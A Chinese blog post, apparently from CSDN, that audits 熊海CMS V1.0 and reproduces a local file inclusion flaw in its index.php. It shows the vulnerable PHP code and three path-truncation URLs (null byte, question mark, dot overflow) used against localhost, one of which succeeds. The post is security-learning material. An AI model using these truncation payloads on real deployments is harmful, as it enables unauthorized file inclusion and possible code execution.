代码审计:熊海cms 首页文件包含漏洞复现

本文介绍了熊海CMS_V1.0版本的代码审计过程,通过Seay工具发现index.php中的文件包含函数存在漏洞。当r参数不为空时,会引发文件包含。随后详细复现了该漏洞,说明如何利用这个漏洞包含根目录下的测试文件1.php。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

代码审计:熊海cms 首页文件包含漏洞复现

熊海cms

熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。
复现版本为 熊海CMS_V1.0 版本,各位可自行下载。

代码审计

先使用Seay工具审计一波,根据关键代码回溯。
在这里插入图片描述
工具显示index.php中文件包含函数存在变量,存在漏洞。
具体代码如下:

<?php
	//单一入口模式
	error_reporting(0); //关闭错误显示
	$file=addslashes($_GET['r']); //接收文件名
	$action=$file==''?'index':$file; //判断为空或者等于index
	include('files/'.$action.'.php'); //载入相应文件
?>

这是个很典型的文件包含漏洞,接受r参数,r不为空则带入包含文件。

漏洞复现

在根目录下存放一个测试文件1.php。
在这里插入图片描述
利用漏洞包含文件。

%00截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?号截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截断,成功
http://localhost/xionghai_v1.0/index.php?r=../1.php..........................
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值